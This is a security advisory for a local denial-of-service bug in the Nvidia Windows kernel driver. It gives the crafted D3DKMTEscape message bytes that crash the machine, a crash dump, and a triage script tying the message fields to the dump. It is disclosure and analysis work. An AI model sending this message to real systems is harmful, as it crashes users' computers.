### Summary
A local denial of service vulnerability exists in the communication functionality of the Nvidia Windows Kernel Mode Driver. A specially crafted message can trigger the vulnerability, resulting in a machine crash (BSOD). An attacker can send a specific message to trigger this vulnerability.
### Tested Versions
(Requires a physical machine)
- Nvidia Windows Kernel Mode Driver, 372.70 (21.21.13.7270)
- Nvidia Windows Kernel Mode Driver, 372.90 (21.21.13.7290)
### Product URLs
http://nvidia.com
### CVSSv3 Score
5.5 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
### Details
A local denial of service vulnerability exists in the communication functionality of the Nvidia Windows Kernel Mode Driver. A specially crafted D3DKMTEscape message can trigger the vulnerability, resulting in a machine crash (BSOD). An attacker can send a specific message to trigger this vulnerability.
```
0x41, 0x44, 0x56, 0x4E, 0x02, 0x00, 0x01, 0x00, 0x40, 0x01, 0x00, 0x00, 0x2A, 0x2A, 0x56, 0x4E,
0x03, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x4E, 0x00, 0x56, 0x00, 0x53, 0x00, 0x50, 0x00,
0x43, 0x00, 0x41, 0x00, 0x50, 0x00, 0x53, 0x00, 0x5C, 0x00, 0x61, 0x00, 0x61, 0x00, 0x31, 0x00,
0x38, 0x00, 0x65, 0x00, 0x62, 0x00, 0x63, 0x00, 0x34, 0x00, 0x2D, 0x00, 0x30, 0x00, 0x31, 0x00,
0x39, 0x00, 0x64, 0x00, 0x2D, 0x00, 0x34, 0x00, 0x65, 0x00, 0x63, 0x00, 0x30, 0x00, 0x2D, 0x00,
0x62, 0x00, 0x66, 0x00, 0x31, 0x00, 0x64, 0x00, 0x2D, 0x00, 0x64, 0x00, 0x36, 0x00, 0x33, 0x00,
0x30, 0x00, 0x30, 0x00, 0x32, 0x00, 0x31, 0x00, 0x38, 0x00, 0x62, 0x00, 0x66, 0x00, 0x35, 0x00,
0x32, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x9F, 0x21, 0x93, 0x00, 0x32, 0xE1, 0x54, 0x00, 0x00, 0x80, 0x84, 0x1E, 0x00
```
This bug happens because the Nvidia driver (nvlddmkm) calls the ZwSetValueKey API with an invalid argument: as the stack trace below shows, the call reaches nt!NtSetValueKey, and the kernel faults inside nt!memcpy while CmpSetValueDataNew copies the value data.
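To show how the captured message lines up with the crash data, here is an added triage script (not part of the advisory) that rebuilds the 320-byte message, pulls out its recognisable fields and checks them against the register and stack values from the `!analyze -v` output: the dword at offset 8 equals the message length, the two dwords after the `2A 2A 56 4E` tag reappear as arguments on the nvlddmkm frame entered from `DXGADAPTER::DdiEscape`, the trailing dword 0x001E8480 (2,000,000) reappears on the `CmpSetValueDataNew` frame, and `rdx+rcx` places the faulting 16-byte `movdqu` read in the same page as the top stack frames, running into the unmapped page at Arg1. The field names are the script's own labels; that the trailing dword is the value-data length handed to ZwSetValueKey is an inference from this match, not something the advisory states.

```python
import struct

# The escape message from the advisory, rebuilt field by field with the zero runs
# collapsed (320 bytes, identical to the hex listed above). Field names below are
# this script's own labels, not the driver's.
VALUE_NAME = "NVSPCAPS\\aa18ebc4-019d-4ec0-bf1d-d6300218bf52"
ESCAPE_MSG = (
    bytes.fromhex("4144564E 02000100 40010000 2A2A564E 03000001")
    + bytes(32)
    + bytes.fromhex("03000000")
    + VALUE_NAME.encode("utf-16-le")
    + bytes(161)
    + bytes.fromhex("9F219300 32E15400 00 80841E00")
)

# Values transcribed from the !analyze -v output in the advisory.
DUMP = {
    "fault_addr": 0xFFFFD00026A46000,             # Arg1: memory referenced
    "rcx": 0xFFFFC001F8688670,                    # trap-frame registers at nt!memcpy+0xa0
    "rdx": 0x00000FFE2E3BD988,
    "top_frame": 0xFFFFD00026A45B00,              # highest Child-SP in STACK_TEXT
    "setvalue_len_arg": 0x001E8480,               # 3rd arg shown for nt!CmpSetValueDataNew
    "escape_entry_args": (0x4E562A2A, 0x01000003),  # args on the nvlddmkm frame under DdiEscape
}

def parse_message(msg):
    """Extract the message fields that can be matched against the dump."""
    size, sub_tag, sub_ver = struct.unpack_from("<III", msg, 8)
    raw = msg[56:]  # UTF-16LE registry name, ended by an aligned 00 00 pair
    n = next(i for i in range(0, len(raw), 2) if raw[i:i + 2] == b"\x00\x00")
    return {"size": size, "sub_tag": sub_tag, "sub_ver": sub_ver,
            "name": raw[:n].decode("utf-16-le"),
            "trailing": struct.unpack_from("<I", msg, len(msg) - 4)[0]}

def memcpy_read_span(rcx, rdx, width=16):
    """movdqu xmm0,[rdx+rcx] reads `width` bytes starting at rdx+rcx (64-bit)."""
    start = (rdx + rcx) & 0xFFFFFFFFFFFFFFFF
    return start, start + width

def correlate(msg=ESCAPE_MSG, dump=DUMP):
    """Tie message fields to the crash arguments and locate the faulting read."""
    f = parse_message(msg)
    start, end = memcpy_read_span(dump["rcx"], dump["rdx"])
    return {
        "size_field_is_msg_len": f["size"] == len(msg),                  # 0x140 == 320
        "escape_args_match": (f["sub_tag"], f["sub_ver"]) == dump["escape_entry_args"],
        "trailing_is_setvalue_len": f["trailing"] == dump["setvalue_len_arg"],  # 2,000,000
        "read_start": start,                                             # 0xffffd00026a45ff8
        "read_crosses_fault_page": start < dump["fault_addr"] < end,     # runs into Arg1 page
        "bytes_above_top_frame": start - dump["top_frame"],              # 0x4f8: same stack page
    }
```

Running `correlate()` returns all three match flags as True, which is the evidence for reading the crash as a kernel memcpy driven by a length taken from the escape message.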
### Crash Information
```
0: kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: ffffd00026a46000, memory referenced.
Arg2: 0000000000000000, value 0 = read operation, 1 = write operation.
Arg3: fffff801b0bcfc20, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 0000000000000000, (reserved)
Debugging Details:
------------------
READ_ADDRESS: ffffd00026a46000
FAULTING_IP:
nt!memcpy+a0
fffff801`b0bcfc20 f30f6f040a movdqu xmm0,xmmword ptr [rdx+rcx]
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: WIN8_DRIVER_FAULT
BUGCHECK_STR: AV
PROCESS_NAME: intel1.exe
CURRENT_IRQL: 0
ANALYSIS_VERSION: 6.3.9600.17298 (debuggers(dbg).141024-1500) amd64fre
TRAP_FRAME: ffffd00026a44670 -- (.trap 0xffffd00026a44670)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=0000000000000000 rbx=0000000000000000 rcx=ffffc001f8688670
rdx=00000ffe2e3bd988 rsi=0000000000000000 rdi=0000000000000000
rip=fffff801b0bcfc20 rsp=ffffd00026a44808 rbp=00000000000054e1
r8=000000000000000c r9=00000000000001cc r10=ffffe00152d2ae68
r11=ffffc001f8688024 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei pl nz na po nc
nt!memcpy+0xa0:
fffff801`b0bcfc20 f30f6f040a movdqu xmm0,xmmword ptr [rdx+rcx] ds:ffffd000`26a45ff8=????????????????????????????????
Resetting default scope
LAST_CONTROL_TRANSFER: from fffff801b0bde42c to fffff801b0bc33a0
STACK_TEXT:
ffffd000`26a44408 fffff801`b0bde42c : 00000000`00000050 ffffd000`26a46000 00000000`00000000 ffffd000`26a44670 : nt!KeBugCheckEx
ffffd000`26a44410 fffff801`b0af2d09 : 00000000`00000000 ffffe001`5c91b080 ffffd000`26a44670 00000000`00000000 : nt! ?? ::FNODOBFM::`string'+0xab6c
ffffd000`26a444b0 fffff801`b0bcd62f : 00000000`00000000 ffffc001`f008dfc4 00000000`00000000 00000000`00000000 : nt!MmAccessFault+0x769
ffffd000`26a44670 fffff801`b0bcfc20 : fffff801`b0f26473 ffffe001`5d517301 ffffc001`00000006 ffffc001`f008dfc4 : nt!KiPageFault+0x12f
ffffd000`26a44808 fffff801`b0f26473 : ffffe001`5d517301 ffffc001`00000006 ffffc001`f008dfc4 ffffd000`26a44860 : nt!memcpy+0xa0
ffffd000`26a44810 fffff801`b0fbcd18 : ffffc001`f8688024 00000000`00000000 00000000`001e8480 ffffc001`ee828000 : nt!CmpSetValueDataNew+0x157
ffffd000`26a44860 fffff801`b0f0f588 : 01d21329`ff575fe0 ffffd000`26a44991 ffffc001`f170fa70 00000025`00000003 : nt! ?? ::NNGAKEGL::`string'+0x27928
ffffd000`26a448d0 fffff801`b0e3a977 : ffffc001`f7837b50 ffffd000`26a44a40 ffffc001`00000003 ffffd000`26a459ac : nt!CmSetValueKey+0x784
ffffd000`26a449e0 fffff801`b0bcebb3 : ffffc001`ee8763a0 ffffd000`26a44c40 00000000`00000000 fffff801`b0e9bc1e : nt!NtSetValueKey+0x55f
ffffd000`26a44bb0 fffff801`b0bc7020 : fffff801`4175a51a 00000000`000054e1 ffffd000`26a44e31 ffffd000`26a459ac : nt!KiSystemServiceCopyEnd+0x13
ffffd000`26a44db8 fffff801`4175a51a : 00000000`000054e1 ffffd000`26a44e31 ffffd000`26a459ac 00000000`000054e1 : nt!KiServiceLinkage
ffffd000`26a44dc0 fffff801`4175a051 : 00000000`000054e1 ffffd000`26a459ac 00000000`000054e1 00000000`000054e1 : nvlddmkm+0xb751a
ffffd000`26a44e80 fffff801`417944e7 : fffff801`41759fc0 ffffd000`26a45870 ffffd000`26a450b0 00000000`00000140 : nvlddmkm+0xb7051
ffffd000`26a44f20 fffff801`41763faf : 00000000`00000000 fffff801`b0dc97e0 ffffe001`52d2a080 ffffc001`ee803000 : nvlddmkm+0xf14e7
ffffd000`26a44f70 fffff801`41f44769 : ffffd000`26a45508 ffffd000`26a450b0 ffffd000`26a45870 00000000`00000000 : nvlddmkm+0xc0faf
ffffd000`26a44fb0 fffff801`41f39e24 : ffffd000`26a45448 ffffd000`26a45658 ffffe001`5d517080 fffff801`b0bcebb3 : nvlddmkm!nvDumpConfig+0x1253a1
ffffd000`26a45410 fffff801`41f44136 : ffffe001`5665a000 ffffd000`26a45519 00000000`00000000 ffffe001`56a96000 : nvlddmkm!nvDumpConfig+0x11aa5c
ffffd000`26a45450 fffff801`41efb43d : ffffd000`26a45780 ffffd000`26a455e9 ffffd000`26a45780 ffffe001`5665a000 : nvlddmkm!nvDumpConfig+0x124d6e
ffffd000`26a45580 fffff801`413604f8 : 00000000`00000002 ffffe001`5c825220 00000000`4e562a2a 00000000`01000003 : nvlddmkm!nvDumpConfig+0xdc075
ffffd000`26a45650 fffff801`413c5b4e : 00000000`00000000 ffffd000`26a45b80 ffffd000`26a45ad0 fffff801`41463b98 : dxgkrnl!DXGADAPTER::DdiEscape+0x48
ffffd000`26a45680 fffff960`002d41d3 : ffffe001`5a294010 ffffe001`5d517080 00000000`7f82f000 ffffe001`5a294010 : dxgkrnl!DxgkEscape+0x802
ffffd000`26a45ab0 fffff801`b0bcebb3 : ffffe001`5d517080 00000000`7f82d000 00000000`0013fdb0 00000000`00000000 : win32k!NtGdiDdDDIEscape+0x53
ffffd000`26a45b00 00000000`773d74aa : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x13
00000000`0013dfd8 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x773d74aa
STACK_COMMAND: kb
FOLLOWUP_IP:
nvlddmkm+b751a
fffff801`4175a51a 85c0 test eax,eax
SYMBOL_STACK_INDEX: b
SYMBOL_NAME: nvlddmkm+b751a
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: nvlddmkm
IMAGE_NAME: nvlddmkm.sys
DEBUG_FLR_IMAGE_TIMESTAMP: 57bf5593
FAILURE_BUCKET_ID: AV_nvlddmkm+b751a
BUCKET_ID: AV_nvlddmkm+b751a
ANALYSIS_SOURCE: KM
FAILURE_ID_HASH_STRING: km:av_nvlddmkm+b751a
FAILURE_ID_HASH: {4bb56d14-bad0-e413-eed6-722441b0442f}
Followup: MachineOwner
---------
```
### Timeline
* 2016-09-30 - Initial Discovery
* 2016-10-17 - Vendor Notification
* 2016-12-14 - Public Disclosure